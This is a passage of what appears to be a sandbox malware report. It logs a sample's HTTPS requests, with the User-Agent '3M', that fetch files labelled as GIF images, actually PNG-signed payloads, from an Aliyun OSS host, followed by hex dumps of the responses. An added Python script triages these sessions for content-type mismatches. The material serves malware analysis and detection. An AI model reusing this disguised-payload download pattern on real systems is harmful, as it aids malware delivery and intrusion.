                                    2025-01-12 03:06:04 UTC4096INData Raw: 17 55 b6 de 1b 71 9b ee 4c d5 15 1d f8 a0 a2 a3 54 26 26 c7 a9 a9 aa aa 6f 61 62 63 7c 7d 7e 7f 78 fd 33 7e b7 3d 2c bb bc bd 4e 3c c1 3e 8a 48 45 d5 c7 c7 c8 81 4f 0b b8 c9 3e 4c d0 2e 9a 58 55 f5 d7 d7 d8 91 5f 1b a8 d9 2e 5c e0 1e aa 68 65 fd e7 e7 e8 a1 6f 2b 98 e9 1e 6c f0 0e ba 78 75 c5 f7 f7 f8 b1 7f 3b 88 f9 0e 7c 00 fe 4a 8e 45 5d 47 bf 0e 09 0a 0b 40 80 03 fd 24 10 12 75 84 59 2f 5f e8 6d 16 53 97 0d 56 9a f2 55 26 d3 a7 27 d9 6f ab 51 d2 2b 58 20 66 a4 60 39 7a b6 e6 41 32 c7 bb 3b c5 73 bf fd 1e 76 c3 a9 43 36 94 0d cd c6 10 48 4a 4b bc ce ce 2f 51 51 52 ac 1c de 97 94 94 95 96 97 90 91 92 93 ac ad ae af a8 25 35 2f eb 85 4a 23 e9 bf 26 e4 aa 05 37 3b f1 bc 02 37 34 f2 6b 37 47 af 0a 50 c8 08 93 cb 0f 4f 6e 0d 76 76 75 c6 09 5f fa 90 d9 1a 58
                                    Data Ascii: UqLT&&oabc|}~x3~=,N<>HEO>L.XU_.\heo+lxu;|JE]G@$uY/_mSVU&'oQ+X f`9zA2;svC6HJK/QQR%5/J#&7;74k7GPOnvvu_X
                                    2025-01-12 03:06:04 UTC4096INData Raw: 1f 5a 7e 3d d3 99 9a d3 17 d6 8e 14 50 ae 14 e7 80 95 2e a6 41 2a aa ab ac e5 25 db 94 f1 31 7a 94 36 7e 48 31 f2 a2 f3 37 e1 9a f7 88 42 06 e3 9b 06 45 38 37 bd e9 48 33 33 ba d1 98 5a 15 9b 5f 1a 9e 5a cd d1 82 da dc 5e 3e c0 a8 20 1b e6 ac 8e 26 bf a0 ea ee 21 07 ea a6 62 f5 71 d8 f2 f4 03 b6 ff d8 8d e9 c8 2e 76 31 bb 8d 43 00 eb d9 44 06 07 40 8a f2 f4 78 2b 46 84 5b 01 98 57 30 25 9e 16 f3 0f a7 1a 1c 1d 1e 57 ad 75 06 13 af ea 62 ac ed c1 3d 60 2c 2d a5 df 0b c4 46 3a b7 7e 2e 17 bb f1 c5 d0 39 32 88 7b 64 71 0a c8 28 61 7e 0f c3 3d 6e 0b 04 c6 12 6b 18 19 d1 97 74 0a 95 9b 94 95 96 97 90 91 92 93 ac ad ae af a8 2d ef 3b 4c 79 3c 23 ef 81 0e 22 f5 b8 3f f8 a5 3c fd 87 30 f2 a0 37 f7 a4 0b 50 68 a1 7f 7c 7b c0 b5 4e cd ba 4a 4c 8c 9b 8e 8f 90 a2 52
                                    Data Ascii: Z~=P.A*%1z6~H17BE87H33Z_Z^> &!bq.v1CD@x+F[W0%Wub=`,-F:~.92{dq(a~=nkt-;Ly<#"?<07Ph|{NJLR
                                    2025-01-12 03:06:04 UTC4096INData Raw: 57 94 e2 9f d0 12 55 73 09 58 61 60 e8 2a 65 eb 2f f9 82 97 e0 2a 6e 8b f3 6e 62 63 7c 7d 7e 7f 78 f9 3b f6 a9 f1 39 79 ad f1 95 7d a6 51 a4 a5 54 ca 70 cd 8a c6 7c cf ce e6 06 ba d8 99 51 11 d5 50 16 a2 34 5c 13 d4 48 1d 1d 13 2c 2d 2e 2f 28 ad 6f ea 01 c2 eb eb 2f 21 22 23 3c 3d 3e 3f 38 b5 a5 bf 7b 15 da b3 77 24 b6 74 0d d1 29 02 04 ed 1d e4 f7 f6 42 8e cc 79 1a 47 9b da ed c3 91 d5 62 1c a0 18 1a 1b 1c 55 9d db 00 7a e1 10 e4 6d a5 e3 08 72 e9 e7 e0 e1 e2 e3 fc fd fe ff f8 75 65 7f bb d5 1a 73 bf c4 de 77 cb 98 4d c4 df 45 46 47 00 c0 3e 6f 7c 05 cb 86 ee 50 52 53 54 1d 59 12 a9 11 d3 27 78 65 38 39 f0 07 04 05 f4 2d ed 6a d9 59 6b 6b 24 e8 a7 1a 50 99 7d 77 74 75 cf 69 78 79 7a 93 b9 7c 7e 7f 39 7e 82 83 84 6d 4d 74 77 76 c2 00 81 01 be 8e 90 dd 19
                                    Data Ascii: WUsXa`*e/*nnbc|}~x;9y}QTp|QP4\H,-./(o/!"#<=>?8{w$t)ByGbUzmrueswMEFG>o|PRSTY'xe89-jYkk$P}wtuixyz|~9~mMtwv
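Added triage example, not part of the Joe Sandbox report and not code from the sample or from the analysed malware: it replays the HTTP exchanges of this section (GET /i.dat, /a.gif and /b.gif, all sent with the two-character User-Agent "3M" to jcoiw1.oss-cn-shanghai.aliyuncs.com) and applies the checks an analyst would want a proxy or IDS to run on them. The request lines, User-Agent and Host headers, Content-Type and Content-Length values and the first body bytes are transcribed from the "Data" rows above; the magic table, the user-agent allow-list, the length threshold and the finding strings are this example's own and are not claims about the malware. Note the verifiable point it surfaces: both responses declared as image/gif begin with the PNG signature 89 50 4e 47 0d 0a 1a 0a. What the 512-byte /i.dat blob encodes is not interpreted here.

```python
"""Content-type / magic-byte and user-agent triage over the three HTTP sessions
recorded in this report section (added example, not report or sample code)."""
import re

# Body prefixes copied from the "Data Raw" rows of sessions 0, 1 and 2.
SESSIONS = [
    {"id": 0, "request": "GET /i.dat HTTP/1.1", "user_agent": "3M",
     "host": "jcoiw1.oss-cn-shanghai.aliyuncs.com",
     "content_type": "application/octet-stream", "content_length": 512,
     "body_prefix": bytes.fromhex("07 1b 1b 1f 6c 25 30 30 5a 53 5f 59 2e 68 77 36")},
    {"id": 1, "request": "GET /a.gif HTTP/1.1", "user_agent": "3M",
     "host": "jcoiw1.oss-cn-shanghai.aliyuncs.com",
     "content_type": "image/gif", "content_length": 135589,
     "body_prefix": bytes.fromhex("89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52")},
    {"id": 2, "request": "GET /b.gif HTTP/1.1", "user_agent": "3M",
     "host": "jcoiw1.oss-cn-shanghai.aliyuncs.com",
     "content_type": "image/gif", "content_length": 125333,
     "body_prefix": bytes.fromhex("89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52")},
]

# Magic-byte table (this example's own, deliberately small). Order matters:
# longer, more specific signatures first.
MAGIC = [
    (b"\x89PNG\r\n\x1a\n", "image/png"),
    (b"GIF87a", "image/gif"),
    (b"GIF89a", "image/gif"),
    (b"\xff\xd8\xff", "image/jpeg"),
    (b"MZ", "application/x-dosexec"),
]

# Expected MIME type per requested file extension (this example's own table).
EXT_MIME = {"gif": "image/gif", "png": "image/png",
            "jpg": "image/jpeg", "jpeg": "image/jpeg"}

# User-agent families accepted as ordinary clients; anything shorter than
# 8 characters that does not match is treated as a custom client string.
# The threshold is an assumption of this example, not a report finding.
KNOWN_UA = re.compile(r"^(Mozilla|curl|Wget|python-requests|Go-http-client)/", re.I)


def sniff(prefix: bytes):
    """Return the MIME type implied by the body's leading bytes, or None."""
    for magic, mime in MAGIC:
        if prefix.startswith(magic):
            return mime
    return None


def check_session(s: dict) -> list:
    """Run the triage checks on one transcribed HTTP exchange."""
    findings = []
    declared = s["content_type"]
    sniffed = sniff(s["body_prefix"])
    path = s["request"].split()[1]
    ext = path.rsplit(".", 1)[-1].lower() if "." in path else ""

    # 1. Header says one type, bytes say another (image/gif vs PNG signature).
    if sniffed and sniffed != declared:
        findings.append(f"content-type mismatch: header says {declared}, body magic says {sniffed}")
    # 2. Requested extension disagrees with the body (a.gif / b.gif are PNGs).
    if ext in EXT_MIME and sniffed != EXT_MIME[ext]:
        findings.append(f"extension .{ext} does not match body magic ({sniffed})")
    # 3. Declared image that carries no image signature at all.
    if declared.startswith("image/") and sniffed is None:
        findings.append("declared image carries no recognised image magic")
    # 4. Very short, non-standard User-Agent ("3M" on every request here).
    if len(s["user_agent"]) < 8 and not KNOWN_UA.match(s["user_agent"]):
        findings.append(f"custom user-agent {s['user_agent']!r}")
    return findings


def triage(sessions=SESSIONS) -> dict:
    """Map session id -> list of finding strings for every transcribed session."""
    return {s["id"]: check_session(s) for s in sessions}


if __name__ == "__main__":
    for sid, hits in triage().items():
        print(f"session {sid}: " + ("; ".join(hits) or "no findings"))
```

Running the block prints one line per session: session 0 is flagged only for the user-agent, sessions 1 and 2 for the user-agent plus the gif/PNG disagreement in both the header and the extension. The same checks can be fed from a proxy log or a PCAP by filling the session dictionaries from the parsed request and the first 16 response bytes; the magic table is kept short on purpose and should be extended with the signatures relevant to the environment.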


                                     Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                     2           192.168.2.5  49983        47.101.26.25    443               6504  C:\Users\user\Desktop\1387457-38765948.15.exe
                                     Timestamp                Bytes transferred  Direction  Data
                                     2025-01-12 03:06:06 UTC  107                OUT        GET /b.gif HTTP/1.1
                                    User-Agent: 3M
                                    Host: jcoiw1.oss-cn-shanghai.aliyuncs.com
                                    Cache-Control: no-cache
                                     2025-01-12 03:06:06 UTC  546                IN         HTTP/1.1 200 OK
                                    Server: AliyunOSS
                                    Date: Sun, 12 Jan 2025 03:06:06 GMT
                                    Content-Type: image/gif
                                    Content-Length: 125333
                                    Connection: close
                                    x-oss-request-id: 6783319E0D39F730360BF450
                                    Accept-Ranges: bytes
                                    ETag: "2CA9F4AB0970AA58989D66D9458F8701"
                                    Last-Modified: Sat, 11 Jan 2025 10:53:19 GMT
                                    x-oss-object-type: Normal
                                    x-oss-hash-crc64ecma: 10333201072197591521
                                    x-oss-storage-class: Standard
                                    x-oss-ec: 0048-00000103
                                    Content-Disposition: attachment
                                    x-oss-force-download: true
                                    Content-MD5: LKn0qwlwqliYnWbZRY+HAQ==
                                    x-oss-server-time: 2
                                    2025-01-12 03:06:06 UTC3550INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                    Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                    2025-01-12 03:06:06 UTC4096INData Raw: 5f 58 dd 1d c6 90 d1 17 9e 99 14 9f 9f e8 24 70 eb ab e0 64 64 64 65 66 67 60 61 62 63 7c 7d 7e 7f 78 fd 3f eb 9c b1 ed f3 3f 51 9e f7 4d c4 05 d1 c5 c5 8e 4c 31 81 43 ca 47 17 86 4c 11 d9 3a 49 f3 d5 d6 21 1b d8 ae d6 66 c5 de df e0 a9 69 2c 0c cd ed e7 e8 a1 61 b7 c8 dd a6 64 37 b9 71 37 d4 aa 35 3b 34 35 36 37 30 31 32 33 cc cd ce cf c8 4d 8b 02 89 1b 0b 0b 44 84 0f 47 93 d0 1a fa 4d 32 16 17 d4 d5 d6 d7 d0 d1 d2 d3 ec ed ee ef e8 6d ab 22 b9 a1 2b 2b 64 ea 6f 3f 30 31 32 33 7c bc 77 3f 70 b4 3f dd 2e 3c 3e 77 c9 40 0a c8 85 86 8a 8b 84 85 86 87 80 81 82 83 9c 9d 9e 9f 98 1d d5 bb 10 11 d7 17 78 7d b6 9d 9f 9e 9d 2b e9 70 7d c1 69 69 22 e6 20 49 4e 87 11 59 72 73 b8 35 25 3f fb 95 5a 33 f7 a4 36 f4 42 c9 0f 8e 81 97 87 87 87 de 4a c3 01 de 86 c7 19 9a
                                    Data Ascii: _X$pdddefg`abc|}~x??QML1CGL:I!fi,ad7q75;45670123MDGM2m"++do?0123|w?p?.<>w@x}+p}ii" INYrs5%?Z36BJ
                                    2025-01-12 03:06:06 UTC4096INData Raw: 6d 6b 6a 06 df 1b 5d a2 58 50 d5 1d 73 88 18 aa a3 a4 a5 4e a1 a8 a9 aa 3b e4 2e 6a 87 73 38 fe 97 bc fd 35 5b 90 00 ad bb bc bd 41 aa f1 c1 c3 c3 41 05 b2 cf 43 8d ee fb 47 05 03 e6 98 5c df bd 6f d4 d6 3f ad d9 da db 94 56 9a fb c8 a9 6b e6 b1 59 e7 e7 a0 64 ae cf c4 a5 6d 2f f8 b9 7b f6 11 4e f7 f7 b0 72 ff c5 40 fc fe b7 89 04 ad b9 05 05 c1 02 9d b3 0b 0b 05 09 0e cf d7 14 9d a9 15 15 17 17 18 19 dd 1e 85 a7 1f 1f 21 21 22 23 9c 2d 26 27 28 61 41 eb 2c 65 a3 22 a1 8b 33 33 bf 61 12 07 70 b0 2e 3a 74 b0 33 f5 42 40 42 ab 09 bb b9 b8 d8 01 c9 8f 64 8e 82 83 9c 19 db 0f 70 75 01 1f db b5 1a 13 d7 84 a1 4a 01 9e 62 63 2c ee dd 9f 68 69 6a 23 e1 39 4a 3f 38 fa bd 36 47 b5 89 62 29 86 7a 7b 34 f8 be 0b b2 c9 01 e7 a0 bd 86 cf 05 c5 ae d3 c4 06 da ab c0 dd
                                    Data Ascii: mkj]XPsN;.js85[AACG\o?VkYdm/{Nr@!!"#-&'(aA,e"33ap.:t3B@BdpuJbc,hij#9J?86Gb)z{4
                                    2025-01-12 03:06:06 UTC4096INData Raw: 4b 9b bd e2 b3 b8 d1 11 54 fa 92 e1 ef 78 e4 29 53 97 53 4e e5 ab a9 aa ef 27 a2 9d 7d f5 34 7b bc 30 77 b6 b7 b8 f5 31 fc b4 f1 33 aa 41 0e 3d 3c 8c 4e 81 df 43 02 8e f0 3c b1 d5 87 11 39 f2 97 ef 25 a9 c5 5d 10 51 01 57 2f d1 9b 39 68 be c7 cc ea ce 93 cc c9 ab e4 5a e5 11 2d 73 10 fd b9 fb 4b 72 e6 f8 dd fb fb be 77 72 ee 10 25 03 03 48 2e c6 46 83 49 f6 d8 e4 41 87 48 18 98 55 0b 55 1a a0 1f 9b f8 15 51 13 a3 9a 0e 20 05 23 23 66 af aa 36 38 0d 2b 2b 60 06 ee 6e bb 71 ce e0 dc 79 bf 70 30 b0 7d 27 7d 32 88 37 c3 a0 4d 09 4b fb c2 56 48 6d 4b 4b 0e c7 c2 5e 40 75 53 53 18 7e 96 16 d3 19 a6 88 b4 11 d7 18 68 e8 25 43 25 ee 66 2e eb a9 6e 27 e5 2a 66 e6 37 55 33 48 a5 7a f3 3e 87 86 85 84 ba 1b 71 00 f4 a5 c2 cb 09 d1 a2 c7 01 fd ae b3 c4 06 41 67 c9 93
                                    Data Ascii: KTx)SSN'}4{0w13A=<NC<9%]QW/9hZ-sKrwr%H.FIAHUUQ ##f68++`nqyp0}'}27MKVHmKK^@uSS~h%C%f.n'*f7U3Hz>qAg
                                    2025-01-12 03:06:06 UTC4096INData Raw: d1 84 d1 1d 87 d9 96 2c 92 1f 7c 91 d5 af 1f 26 92 a4 81 a7 a7 ea 23 26 9a bc 89 af af fc 9a 7a f2 3f f4 4a 64 50 ba 4a 30 7a f4 bd 7d 88 c2 05 8b ff 1d b4 ec 89 c6 7c c2 8d 32 0e 4c 31 de 98 dc 6a 51 e7 d7 fc d8 da 99 56 51 ef cf c4 e0 e2 af cf 2d a7 6c b9 15 39 01 13 27 ab d4 33 83 57 b6 71 35 f9 b3 2d 72 38 10 fe 76 3b b7 8b 5d 26 13 4c 8e 6a 23 10 41 81 7f 28 2d 46 84 6c 35 3a 52 4a d6 da db d4 51 93 47 38 15 56 96 54 05 32 6b ad 59 02 3f 69 7c 6b 7d 6d 7a 66 ac dc 01 7f b8 c5 7c bd ef 70 b2 c8 77 b7 d4 0d c0 01 78 3a 47 30 4a 0b 24 30 4d a2 b9 b8 b2 b1 06 dd 45 55 b8 52 1d dd 80 1c d2 a5 13 d9 8f 51 db 17 60 62 63 21 e0 99 13 79 81 b9 9f 93 92 26 e4 b8 39 11 30 70 3d 75 bf 93 7a 32 f0 b3 3d 46 06 90 8e 06 d7 85 85 86 be f3 81 ff 83 b5 b6 81 02 d7 90
                                    Data Ascii: ,|&#&z?JdPJ0z}|2L1jQVQ-l9'3Wq5-r8v;]&Lj#A(-Fl5:RJQG8VT2kY?i|k}mzf|pwx:G0J$0MEURQ`bc!y&90p=uz2=F
                                    2025-01-12 03:06:06 UTC4096INData Raw: 1a f0 b1 a6 df 11 dd be b3 d0 14 ea bb 80 49 6d 55 5b 5a ea 2c d5 29 e7 20 eb a5 e6 22 a5 21 1d 4c 4b f4 b9 01 b0 3a 5b b4 f4 b2 00 3b d1 c1 e6 c2 c4 4f 4a d6 d8 ed cb cb 80 e6 0e 8e 5b 91 2e 00 3c 98 5f 90 d0 98 53 9c c4 9c d1 69 e8 62 03 ec ac ea 58 63 f9 e9 ce ea ec 67 62 fe e0 d5 f3 f3 b8 de 36 b6 73 b9 06 28 14 b0 77 b8 08 40 8b 44 18 44 09 b1 00 8a eb 04 44 02 b0 8b 01 11 36 12 14 9f 9a 06 08 3d 1b 1b 50 36 de 5e ab 61 de f0 cc ae 6a 03 40 68 a3 6c 0c d2 ef 62 b9 76 3a 7a b9 75 32 76 b3 29 73 b2 7b 35 7f b6 17 65 cb 0f 60 2d 7d 0a 88 46 c8 5a b2 b2 b1 0e a6 57 12 27 05 1c dd 81 10 d2 94 b3 69 81 a1 a0 e4 a1 6d e7 f0 65 66 67 83 55 e9 16 9c 6d 18 59 f0 cc 8a 73 74 75 76 78 fd ee 7a 7b 7c f6 fb 7f 81 81 82 cf 0f 4b ca 0e ec ad b2 c6 07 48 07 cb b4 a1
                                    Data Ascii: ImU[Z,) "!LK:[;OJ[.<_SibXcgb6s(w@DDD6=P6^aj@hlbv:zu2v)s{5e`-}FZW'imefgUmYstuvxz{|KH
                                    2025-01-12 03:06:06 UTC4096INData Raw: 52 57 d5 c5 df 1b 75 ba d3 17 44 d6 14 62 e9 2f ae 41 67 a6 a7 a7 fe 6a e3 25 a6 e6 22 e3 b9 fa 3e fc bd b9 a6 ba 51 99 6c 43 42 f6 32 c5 29 06 c3 c4 8d 4f c4 80 42 09 83 4f 09 ee 94 13 99 51 b2 c4 d5 9e 5a dd 39 1e db dc 95 57 9e e8 a9 6f e6 21 21 e6 e7 a0 60 eb a3 67 2c 2d 23 3c b1 a1 a5 a3 b4 a2 b6 ad b8 ac ba ab b5 7d 13 70 49 89 fa 41 36 f9 43 81 75 2e 2b 48 2c b2 2b a0 11 12 13 58 34 6a 33 30 55 3b a7 38 d5 1e 1f 20 c9 85 ff db da 6a ac 40 01 66 a2 40 09 6e c7 a9 ed cd cc 7c be 76 17 70 b0 be 1f fc 3d 3e 3f 08 ca 35 13 0c cc f2 63 f0 49 4a 4b 04 c6 09 07 18 d8 16 77 64 1d dd 08 18 11 d1 1c 6c 15 d7 1b 44 29 2e e8 13 4d 2a ee 1c 4d 3a 23 e7 a6 86 29 7f 71 72 9b 21 a9 89 88 30 f0 0a 5b 94 31 a2 80 7f c9 0b db ac 6d c5 5b 77 76 c2 00 dc ad c6 04 c2 b9
                                    Data Ascii: RWuDb/Agj%">QlCB2)OBOQZ9Wo!!`g,-#<}pIA6Cu.+H,+X4j30U;8 j@f@n|vp=>?5cIJKwdlD).M*M:#)qr!0[1m[wv
                                    2025-01-12 03:06:06 UTC4096INData Raw: 83 dd 52 57 b7 9d 0a 83 72 99 9d 9e 9f 6c 6d 6e 6f 68 66 6a 6b 64 65 66 67 60 61 62 63 7c 7d 7e 7f 78 76 7a 7b 74 f1 31 be a9 0f be bf 88 4c d7 ad 73 3a 39 8f f3 0b be e8 a9 85 45 cb f5 e1 d2 d3 d4 9d 5d 5e 40 d9 da db 94 e6 96 cf 92 e7 aa d8 ac ed 90 e0 51 e4 ea eb ec 20 c7 2c 3c b1 a1 bb 77 19 d6 c4 23 b1 77 ee 81 8c ff ff 45 32 c2 4b 89 09 9d 4f 85 05 c0 b1 ac 02 0e 0f f8 c9 10 13 14 90 d6 63 09 e6 1f 9d 6d 1c 1e e0 e3 a2 d9 22 56 f6 96 26 c3 2e c2 21 2c 2d 2e 1d f0 79 b1 f7 14 6e f5 fb f4 79 69 73 bf d1 1e b4 5d 21 33 42 44 ae 5b 0f c5 4c 65 3a 4d 4d b1 84 18 dc 5e c8 1c d8 5a 9f a7 4c 4d eb 5c 5d a1 52 21 10 63 63 e1 be 13 b8 d8 68 22 e8 a8 4d 35 ac bc 39 fb 2f 50 7d 3e fe 14 5d 6a 33 f5 09 5a 67 d7 c0 d6 c2 d1 c4 d0 c6 df c1 09 67 ac 06 77 c3 1d ac
                                    Data Ascii: RWrlmnohfjkdefg`abc|}~xvz{t1Ls:9E]^@Q ,<w#wE2KOcm"V&.!,-.ynyis]!3BD[Le:MM^ZLM\]R!cch"M59/P}>]j3Zggw
                                    2025-01-12 03:06:06 UTC4096INData Raw: 94 1c 96 de 68 5b d0 17 e4 9e dd 1a 69 d4 bd e2 27 49 d0 0c e7 28 57 8a df aa ed 2e 51 b9 c4 2c fb 31 6e c2 be 7e fa 45 bb 57 be f6 40 0f 81 f0 35 4e c2 42 07 c7 4d 1c cb cc cd f2 ef a4 d5 ee da a1 d2 9e 28 1f 53 dd 30 2d 59 1e d0 64 5e e2 e3 e4 a8 63 11 9c ee a3 62 f2 a4 6d 29 f8 b8 0d b6 f4 4f f7 f7 f8 f9 c9 3b 17 f8 b6 00 c7 fe c2 89 0b 85 ff 5b 7c fd 8a f2 2e 78 3f 8b d2 64 0a 53 90 e3 62 1d 20 56 1b 6e 19 55 e1 d8 cb 28 11 f1 64 a1 d0 67 27 bd ec fa c4 c6 3f d0 f8 79 b7 e8 40 33 f0 34 64 71 c5 f8 75 c2 3a 1b c5 81 37 a8 ce 42 c2 87 3c 0f 0a cf ba 38 46 73 70 25 6f 6f 5d 21 6f d2 8a 2d 77 13 d9 86 2a 5a e8 62 2a 9c a7 6a d8 68 80 99 59 6b 6c e8 ae 1b 63 38 8d 77 50 3d 89 b0 30 fc a1 0f 7b f7 79 f7 83 c9 7d 40 cd 7a 82 a3 c0 76 4d 62 e9 72 71 70 d8 14
                                    Data Ascii: h[i'I(W.Q,1n~EW@5NBM(S0-Yd^cbm)O;[|.x?dSb VnU(dg'?y@34dqu:7B<8Fsp%oo]!o-w*Zb*jhYklc8wP=0{y}@zvMbrqp
                                    2025-01-12 03:06:06 UTC4096INData Raw: 9b dc 16 6d 8f ed 48 d2 10 91 71 cd 9e a0 49 dd 58 5b 5a ee 24 8d 76 f9 aa ac ad e6 2c 74 91 e9 70 78 fd 35 76 88 f1 45 9e 19 2d be bf 0c 89 41 02 f4 8d 39 e2 69 59 ca cb 00 85 47 93 f4 d9 9e 5a 98 f1 f6 80 90 5a 36 fb 95 56 07 96 6b 19 69 e9 0c 8d ec e7 e8 79 a2 60 eb a5 65 e7 b8 7a 73 7b f4 f5 f6 07 07 f9 71 f0 14 59 f4 ff 00 49 89 5f 20 35 4e 84 cc 29 55 c8 c0 45 87 53 34 19 5e 9a 58 31 36 40 50 9a f6 3b 55 96 c7 56 ab d9 a9 29 cc 0d 2c 27 28 b9 62 a0 23 1e fc 67 bb 38 da 95 36 35 36 a7 b3 32 d2 5d 36 3d 3e 77 cb 1d 66 73 0c c6 82 67 17 8a 86 87 80 05 c7 13 74 59 1e da 18 71 76 00 10 da b6 7b 15 d6 87 16 eb 99 e9 69 8c 8d 6f 67 68 f9 22 e0 2b 65 26 e4 60 39 f9 7c 3c fe 64 3f f3 70 92 25 7e 7d 7e ef 0b 8a 6a 9d 8e 85 86 cf 03 d5 ae bb c4 0e 4a af cf 52
                                    Data Ascii: mHqIX[Z$v,tpx5vE-A9iYGZZ6Vkiy`ezs{qYI_ 5N)UES4^X16@P;UV),'(b#g86562]6=>wfsgtYqv{iogh"+e&`9|<d?p%~}~jJR


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    3192.168.2.54998447.101.26.254436504C:\Users\user\Desktop\1387457-38765948.15.exe
                                    TimestampBytes transferredDirectionData
                                    2025-01-12 03:06:08 UTC107OUTGET /c.gif HTTP/1.1
                                    User-Agent: 3M
                                    Host: jcoiw1.oss-cn-shanghai.aliyuncs.com
                                    Cache-Control: no-cache
                                    2025-01-12 03:06:08 UTC545INHTTP/1.1 200 OK
                                    Server: AliyunOSS
                                    Date: Sun, 12 Jan 2025 03:06:08 GMT
                                    Content-Type: image/gif
                                    Content-Length: 10681
                                    Connection: close
                                    x-oss-request-id: 678331A0E5C23A38318A5A3A
                                    Accept-Ranges: bytes
                                    ETag: "10A818386411EE834D99AE6B7B68BE71"
                                    Last-Modified: Sat, 11 Jan 2025 10:53:19 GMT
                                    x-oss-object-type: Normal
                                    x-oss-hash-crc64ecma: 10287299869673359293
                                    x-oss-storage-class: Standard
                                    x-oss-ec: 0048-00000103
                                    Content-Disposition: attachment
                                    x-oss-force-download: true
                                    Content-MD5: EKgYOGQR7oNNma5re2i+cQ==
                                    x-oss-server-time: 1
                                    2025-01-12 03:06:08 UTC3551INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                    Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                    2025-01-12 03:06:08 UTC4096INData Raw: cf 62 ff 5a 3f 30 31 3a fe ee 75 37 8a ba 5b 85 e1 ec 6b 35 10 78 f6 6d 36 3d 23 d2 d0 cd ab db f8 37 32 1f 37 11 bf 96 19 b0 c6 be a6 a0 ee eb 24 5d 48 ae 73 f3 f5 c5 94 b0 70 dd c6 5c 11 f5 e3 28 66 41 36 66 ef 88 eb 8b 2d 92 d1 9e 9a 8e 78 c0 74 34 67 7b b1 f3 fc 59 49 81 89 f5 cf 42 a2 b8 b8 7a d9 bb 7f 45 04 62 02 52 34 b9 0e 45 7f ce ff c3 12 7c ec ed 9c 64 e7 85 d4 e8 6d e9 e8 2d c8 3d 69 6a 0d 66 e5 c2 e6 27 9e d7 9e 98 68 92 43 fb c4 05 18 16 a9 a8 72 cc e5 66 13 b1 0c 24 22 dc 23 42 b1 c5 b3 c5 9f fd f3 d6 88 82 8e d7 81 8f 50 ee 36 68 55 e9 6b 5a ae a1 ec ca 4e e8 e9 82 52 74 0c 38 e0 2c 9b 17 6f 51 cf 4d 52 2a df 70 1d 00 4d 53 4a 65 f0 2f 99 7a fa 82 f9 0c fb 20 75 c3 54 ed 1d 83 3b 0b af 29 d0 11 b9 47 4d 64 2c b9 73 9e 4e 8d b6 ee f3 66 39
                                    Data Ascii: bZ?01:u7[k5xm6=#727$]Hsp\(fA6f-xt4g{YIBzEbR4E|dm-=ijf'hCrf$"#BP6hUkZNRt8,oQMR*pMSJe/z uT;)GMd,sNf9
